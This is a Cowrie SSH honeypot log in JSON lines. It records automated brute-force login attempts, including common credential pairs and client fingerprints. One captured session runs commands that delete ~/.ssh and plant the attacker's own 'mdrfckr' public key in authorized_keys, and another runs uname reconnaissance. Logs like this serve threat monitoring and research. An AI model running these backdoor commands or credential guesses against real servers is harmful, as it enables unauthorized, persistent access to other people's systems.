{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":55128,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9397ba5f32c","protocol":"ssh","message":"New connection: 217.154.1.158:55128 (1.2.3.4:22) [session: c9397ba5f32c]","sensor":"my-vps","timestamp":"2025-08-26T20:01:08.596641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:01:08.598551Z","src_ip":"217.154.1.158","session":"c9397ba5f32c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:01:08.616164Z","src_ip":"217.154.1.158","session":"c9397ba5f32c"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T20:01:08.666110Z","src_ip":"217.154.1.158","session":"c9397ba5f32c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:09.683619Z","src_ip":"217.154.1.158","session":"c9397ba5f32c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":42066,"dst_ip":"1.2.3.4","dst_port":22,"session":"196d596daca5","protocol":"ssh","message":"New connection: 217.154.1.158:42066 (1.2.3.4:22) [session: 196d596daca5]","sensor":"my-vps","timestamp":"2025-08-26T20:01:26.066205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:01:26.067248Z","src_ip":"217.154.1.158","session":"196d596daca5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:01:26.082154Z","src_ip":"217.154.1.158","session":"196d596daca5"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools123","message":"login attempt [tools/tools123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:01:26.190436Z","src_ip":"217.154.1.158","session":"196d596daca5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:27.206889Z","src_ip":"217.154.1.158","session":"196d596daca5"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":43406,"dst_ip":"1.2.3.4","dst_port":22,"session":"678062a3c274","protocol":"ssh","message":"New connection: 199.195.248.191:43406 (1.2.3.4:22) [session: 678062a3c274]","sensor":"my-vps","timestamp":"2025-08-26T20:01:33.479451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:01:33.484346Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:01:33.581413Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.login.success","username":"root","password":"rootadmin@123","message":"login attempt [root/rootadmin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:01:33.939961Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:01:34.247545Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.248687Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.252113Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.350735Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:01:34.544968Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.545679Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.639895Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.640785Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":43974,"dst_ip":"1.2.3.4","dst_port":22,"session":"461a75aed339","protocol":"ssh","message":"New connection: 199.195.248.191:43974 (1.2.3.4:22) [session: 461a75aed339]","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.725384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.735472Z","src_ip":"199.195.248.191","session":"461a75aed339"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:01:34.821067Z","src_ip":"199.195.248.191","session":"461a75aed339"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:01:35.181135Z","src_ip":"199.195.248.191","session":"461a75aed339"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.284546Z","src_ip":"199.195.248.191","session":"461a75aed339"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":44620,"dst_ip":"1.2.3.4","dst_port":22,"session":"810615554c00","protocol":"ssh","message":"New connection: 199.195.248.191:44620 (1.2.3.4:22) [session: 810615554c00]","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.369921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.372409Z","src_ip":"199.195.248.191","session":"810615554c00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.462382Z","src_ip":"199.195.248.191","session":"810615554c00"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.831906Z","src_ip":"199.195.248.191","session":"810615554c00"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.929482Z","src_ip":"199.195.248.191","session":"678062a3c274"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:36.930687Z","src_ip":"199.195.248.191","session":"810615554c00"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47948,"dst_ip":"1.2.3.4","dst_port":22,"session":"51834f0273e3","protocol":"ssh","message":"New connection: 217.154.1.158:47948 (1.2.3.4:22) [session: 51834f0273e3]","sensor":"my-vps","timestamp":"2025-08-26T20:01:43.868419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:01:43.869375Z","src_ip":"217.154.1.158","session":"51834f0273e3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:01:43.882851Z","src_ip":"217.154.1.158","session":"51834f0273e3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T20:01:43.925153Z","src_ip":"217.154.1.158","session":"51834f0273e3"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:44.941217Z","src_ip":"217.154.1.158","session":"51834f0273e3"}
{"eventid":"cowrie.session.closed","duration":"247.0","message":"Connection lost after 247.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:01:49.641105Z","src_ip":"212.227.235.229","session":"4371d4098275"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":30126,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3d74a574ac7","protocol":"ssh","message":"New connection: 213.108.243.7:30126 (1.2.3.4:22) [session: a3d74a574ac7]","sensor":"my-vps","timestamp":"2025-08-26T20:01:59.900772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:01:59.902581Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:02:00.013661Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t^Y","message":"login attempt [root/1q@W3e$R5t^Y] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:02:00.869084Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:02:01.195002Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.195768Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.300143Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.310880Z","src_ip":"213.108.243.7","session":"a3d74a574ac7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47746,"dst_ip":"1.2.3.4","dst_port":22,"session":"1057d68fda64","protocol":"ssh","message":"New connection: 217.154.1.158:47746 (1.2.3.4:22) [session: 1057d68fda64]","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.341084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.341979Z","src_ip":"217.154.1.158","session":"1057d68fda64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.358079Z","src_ip":"217.154.1.158","session":"1057d68fda64"}
{"eventid":"cowrie.login.failed","username":"www","password":"www","message":"login attempt [www/www] failed","sensor":"my-vps","timestamp":"2025-08-26T20:02:01.457799Z","src_ip":"217.154.1.158","session":"1057d68fda64"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:02.476843Z","src_ip":"217.154.1.158","session":"1057d68fda64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:02:03.715074Z","src_ip":"212.227.125.160","session":"b955d4d7ad6c"}
